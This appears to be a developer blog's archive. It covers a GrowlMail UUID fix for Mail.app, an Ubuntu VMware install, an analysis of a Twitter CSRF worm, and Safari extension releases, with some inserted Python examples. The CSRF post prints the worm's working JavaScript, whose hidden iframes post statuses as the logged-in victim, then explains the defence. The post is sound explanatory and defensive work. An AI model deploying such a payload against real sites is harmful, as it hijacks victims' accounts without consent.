Fixing GrowlMail in 10.6.5 (Mail 4.4)

Update: Fix for 10.6.7 and Mail 4.5

Another OS X release (beta as of this posting), another broken GrowlMail bundle. Mail.app only loads a bundle whose Info.plist lists the compatibility UUIDs of the currently installed Mail and Message framework; each update ships new UUIDs, so any bundle that hasn't been updated to list them is moved aside and disabled. I did a post just like this for 10.6.2 (and 10.6.4); check it out if you want more background on why this occurs.

Easy Fix

Download a pre-patched GrowlMail.bundle and drop it in your ~/Library/Mail/Bundles/ directory¹. If you want it available to multiple users on your system, use /Library/Mail/Bundles/.

Download GrowlMail 10.6.5 mailbundle

If you use this method you’re all set; no need to use the command line solution below.

Add New UUIDs to SupportedPluginCompatibilityUUIDs

If Mail.app has already been opened and has disabled your plugins, quit Mail, look in ~/Library/Mail (or /Library/Mail if you installed globally), and move the bundles back into the active Bundles directory before running the commands below. They'll typically be in Bundles (Disabled). Run each command only once: -array-add appends unconditionally, so a repeat run leaves duplicate entries in the array.

If you have a local installation:

defaults write ~/Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "857A142A-AB81-4D99-BECC-D1B55A86D94E"
defaults write ~/Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "BDD81F4D-6881-4A8D-94A7-E67410089EEB"

Global installation:

defaults write /Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "857A142A-AB81-4D99-BECC-D1B55A86D94E"
defaults write /Library/Mail/Bundles/GrowlMail.mailbundle/Contents/Info SupportedPluginCompatibilityUUIDs -array-add "BDD81F4D-6881-4A8D-94A7-E67410089EEB"
  1. ~ means your home directory if you're unfamiliar with the syntax. You can click the home icon on your Finder sidebar if you're still confused.
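As an added example (this is not the post's own code, nor part of GrowlMail), here is a Python 3 script that performs the same two steps, moving any bundles out of Bundles (Disabled) and adding the two UUIDs, but checking for them first so it is safe to run more than once. The glob used to find the disabled folder, the function names and the default ~/Library/Mail path are this example's own assumptions.

```python
#!/usr/bin/env python3
"""Re-enable GrowlMail after a Mail.app update (added example, not the original post's code).

Assumptions: the two UUIDs are the ones from the post; disabled bundles live in a
directory whose name starts with "Bundles (Disabled"; everything else (paths and
function names) is invented for this example.
"""
import plistlib
import shutil
import sys
from pathlib import Path

# The two compatibility UUIDs the post adds for Mail 4.4 on 10.6.5.
MAIL_4_4_UUIDS = [
    "857A142A-AB81-4D99-BECC-D1B55A86D94E",
    "BDD81F4D-6881-4A8D-94A7-E67410089EEB",
]

KEY = "SupportedPluginCompatibilityUUIDs"


def add_compatibility_uuids(info_plist, uuids=MAIL_4_4_UUIDS):
    """Add any missing UUIDs to the bundle's Info.plist; return the ones added.

    Unlike `defaults write ... -array-add`, this checks for duplicates first,
    so running it twice leaves the array unchanged the second time.
    """
    info_plist = Path(info_plist)
    with info_plist.open("rb") as fh:
        info = plistlib.load(fh)          # reads XML or binary plists
    present = list(info.get(KEY, []))
    added = [u for u in uuids if u not in present]
    if added:
        info[KEY] = present + added
        with info_plist.open("wb") as fh:
            plistlib.dump(info, fh)       # written back as XML, which Mail reads fine
    return added


def restore_disabled_bundles(mail_dir):
    """Move *.mailbundle entries from Bundles (Disabled*) back into Bundles.

    Mail moves incompatible bundles aside; they have to be moved back (with Mail
    quit) or the UUID fix has nothing to act on. Returns the restored paths.
    """
    mail_dir = Path(mail_dir)
    active = mail_dir / "Bundles"
    active.mkdir(parents=True, exist_ok=True)
    restored = []
    # Assumption: newer Mail versions number the folder, so match the prefix.
    for disabled in sorted(mail_dir.glob("Bundles (Disabled*)")):
        for bundle in sorted(disabled.glob("*.mailbundle")):
            target = active / bundle.name
            if target.exists():
                continue                  # never clobber a bundle that is already active
            shutil.move(str(bundle), str(target))
            restored.append(target)
    return restored


def fix_growlmail(mail_dir):
    """Restore disabled bundles, then patch GrowlMail's Info.plist."""
    restore_disabled_bundles(mail_dir)
    plist = Path(mail_dir) / "Bundles" / "GrowlMail.mailbundle" / "Contents" / "Info.plist"
    if not plist.is_file():
        raise FileNotFoundError("no GrowlMail bundle under %s" % mail_dir)
    return add_compatibility_uuids(plist)


if __name__ == "__main__":
    # ~/Library/Mail for a per-user install; pass /Library/Mail for a global one.
    target = sys.argv[1] if len(sys.argv) > 1 else str(Path.home() / "Library" / "Mail")
    print("added:", fix_growlmail(target))
```

Quit Mail before running it, exactly as with the manual commands; the script refuses to overwrite a bundle that is already active and reports which UUIDs it actually added, so an empty list on a second run is the expected result.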

Ubuntu 10.10 (Maverick Meerkat) In VMware Fusion

I decided to check out Ubuntu 10.10 RC today and I'm pleased to report that installation of the latest version in VMware Fusion (3.1.1) was trivial. I grabbed the install CD, told it to use "easy install" and away it went. Mouse ungrab, drag/drop file sharing, sound, et cetera were all available as soon as the GUI came up after the VMware tools install completed. HGFS was available as well under /mnt/hgfs. If you're running an older version of VMware you may need to upgrade or grab the latest tools¹ to have such a smooth experience.

  1. My version is 8.4.3

CSRF Matters (Or: Why Twitter Users Don’t Actually Love Anal Sex With Goats)

Update: Twitter has disabled this vector by removing the /share/update method, which posted a status from a plain GET with no confirmation step. This prevents future attacks of this exact type.¹

A new “worm” is making the rounds on Twitter this morning, driven by a t.co link. At first glance this might seem to be a flaw similar to the one from just a few days ago, but it’s not. Let’s take a look at the payload.

var el1 = document.createElement('iframe');   // one hidden iframe per forged tweet
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";                 // nothing visible to the victim
el2.style.visibility="hidden";
// Loading these URLs is a plain GET; the browser sends the victim's twitter.com
// session cookie with it, so /share/update posts the status as the victim.
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;   // tweets this page's own URL: the spreading step
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);   // attaching the iframes fires the requests
document.getElementsByTagName("body")[0].appendChild(el2);

Amazingly simple, right? All the page does is create two hidden iframes, set their src to URLs that post those two updates, and append them to the body of the page. From the user's perspective all that happens is a blank page when they click the link, but in reality it has just posted a copy of its own URL plus "i love anal sex with goats" to their account. It only works if the victim is currently logged in, because the browser attaches the twitter.com session cookies to the iframe's request no matter which site embedded it, but for most Twitter users that's not much of an obstacle.

So how do you stop cross site request forgery (CSRF) like this? The standard fix is a per-session secret token (a nonce) embedded in Twitter's own pages and required on every request that changes state; a page on another origin can't read that token, so the forged request is rejected.² Requiring a POST rather than a GET for state changes also closes the <iframe src> trick specifically, since an iframe navigation can only issue a GET. Either would have stopped this worm in its tracks, but at the expense of disabling one-click updates to Twitter from other websites (a confirmation page such as /home?status keeps the feature at the cost of a click).
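To make the difference concrete, here is an added example (not Twitter's code and not the worm author's) that models the pre-fix /share/update handler next to a hardened one using a synchronizer token derived from the session, then feeds both the request the hidden iframe actually sends. The session store, cookie and header names, handler names and server key are assumptions made for the demonstration.

```python
"""CSRF on /share/update, vulnerable vs. hardened (added example, not Twitter's code).

Assumptions: a cookie named _twitter_sess identifies the session, the token is
posted as authenticity_token, and SERVER_KEY is a per-deployment secret.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)      # rotate if it ever leaks; invalidates all tokens

# Constructed sample session store and timeline.
SESSIONS = {"sess-victim": "alice"}       # cookie value -> user
TIMELINE = []                             # (user, status) tuples that got posted


@dataclass
class Request:
    method: str
    url: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)      # POST body fields
    headers: dict = field(default_factory=dict)


def current_user(req):
    return SESSIONS.get(req.cookies.get("_twitter_sess"))


def vulnerable_share_update(req):
    """Pre-fix behaviour: anything carrying a valid session cookie posts a status."""
    user = current_user(req)
    if user is None:
        return 403, "login required"
    status = parse_qs(urlsplit(req.url).query).get("status", [""])[0]
    TIMELINE.append((user, status))
    return 200, "tweeted"


def csrf_token_for(session_cookie):
    """Synchronizer token: HMAC(server key, session id), so no per-token storage is needed.

    Twitter's own forms would embed this; a page on another origin cannot read it.
    """
    return hmac.new(SERVER_KEY, session_cookie.encode(), hashlib.sha256).hexdigest()


def same_origin(req):
    """Defence in depth: Origin (or Referer) must be twitter.com itself."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return parts.scheme == "https" and parts.netloc == "twitter.com"


def hardened_share_update(req):
    """Fixed handler: POST only, same-origin check, and a token bound to the session."""
    user = current_user(req)
    if user is None:
        return 403, "login required"
    if req.method != "POST":
        return 405, "state change requires POST"      # an <iframe src> can only GET
    if not same_origin(req):
        return 403, "cross-origin request refused"
    expected = csrf_token_for(req.cookies["_twitter_sess"])
    supplied = req.form.get("authenticity_token", "")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):  # constant time
        return 403, "missing or invalid CSRF token"
    TIMELINE.append((user, req.form.get("status", "")))
    return 200, "tweeted"


def worm_request():
    """What the payload's hidden iframe sends: a GET carrying the victim's cookie."""
    return Request(
        method="GET",
        url="http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats",
        cookies={"_twitter_sess": "sess-victim"},
        headers={"Referer": "http://evil.example/"},
    )


def legitimate_request(status):
    """A form submitted from twitter.com, carrying the token the page embedded."""
    return Request(
        method="POST",
        url="https://twitter.com/share/update",
        cookies={"_twitter_sess": "sess-victim"},
        form={"status": status, "authenticity_token": csrf_token_for("sess-victim")},
        headers={"Origin": "https://twitter.com"},
    )
```

The token check is the real control; the Origin/Referer test is there because those headers are cheap to verify but can be stripped by proxies or privacy settings, so a handler must not rely on them alone. Note that the worm's request is rejected twice over: once for being a GET and, if the attacker upgraded to a cross-site POST form, again for lacking a token it has no way to obtain.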

Given the rapid rise of Twitter and people's increasing reliance on the sanctity of their timelines, this type of attack will almost certainly become more common until Twitter changes its rules. As always, the tradeoff between convenience and security is a tough one.

  1. Other potential vectors like /home?status require user interaction, so alternate methods will have to be developed by worm authors.
  2. OWASP has more information and reference implementations to protect against CSRF, XSS, and more.

AvianSafari 1.0.2

Just a quick note that AvianSafari 1.0.2 has been released. If you're on a previous version you should upgrade immediately since the API key was reset (I foolishly committed it to my local repo and forgot I was planning on pushing it to a public GitHub repository). If you're seeing Twitter authentication requests in Safari then that's the manifestation of the issue. Sorry about that!

Download now!

AvianSafari, A Safari Extension

I’m extremely proud to announce AvianSafari, a browser bar based Twitter client for Safari. You should check it out right now and then come back and read about it. I can wait.

Okay, now that you’ve got it installed we can move on. AvianSafari supports the following:

  • Home Timeline
  • Mentions
  • Sent Direct Messages
  • Received Direct Messages
  • Tweet Pagination (Scroll Wheel or Arrow Buttons)
  • Unread Tracking
  • Search
  • Trends
  • Native Retweet
  • Reply
  • Tweeting
  • Delete Tweets
  • Sending Direct Messages
  • URL Shortening (TinyURL, TinyVH, bit.ly, j.mp, is.gd)
  • Authenticated URL shortening for bit.ly / j.mp
  • Variable Update Interval
  • Controllable Link Behavior (new tab, current tab, tab position, et cetera)
  • Conversation threads
  • Linking @mentions and URLs
  • Much, much more!

For communication with Twitter I created AvianLib, an OAuth/Twitter library written in JavaScript. I'll be putting AvianLib up as a separate project on GitHub in the near future so others can consume it. If you'd like to take a look at AvianSafari's source code or provide feedback, head on over!

AvianSafari Product Page

Big thanks to Brian Kim (icons), Matt Pennig (general JS guru), and Clay Benson (website).

Optimize Legibility (Safari Extension)


View All My Safari Extensions

John Gruber linked to an article about the text-rendering:optimizeLegibility CSS property today and as he said, news to me. I’ve built a quick Safari extension to enable it by default in Safari (Firefox already does this). So, without further ado:

Optimize Legibility is a simple Safari extension that injects a single CSS rule (text-rendering: optimizeLegibility) into every page, which turns on kerning and ligatures in rendered text.

Download it or view the (trivial) source at GitHub.

Update: 1.0.2 adds an icon and changes the injected rule to match body rather than the * wildcard selector. Since text-rendering is inherited, the single body rule has the same effect without being matched against every element on the page, so it should improve performance slightly (although it won't be noticeably faster on any modern machine).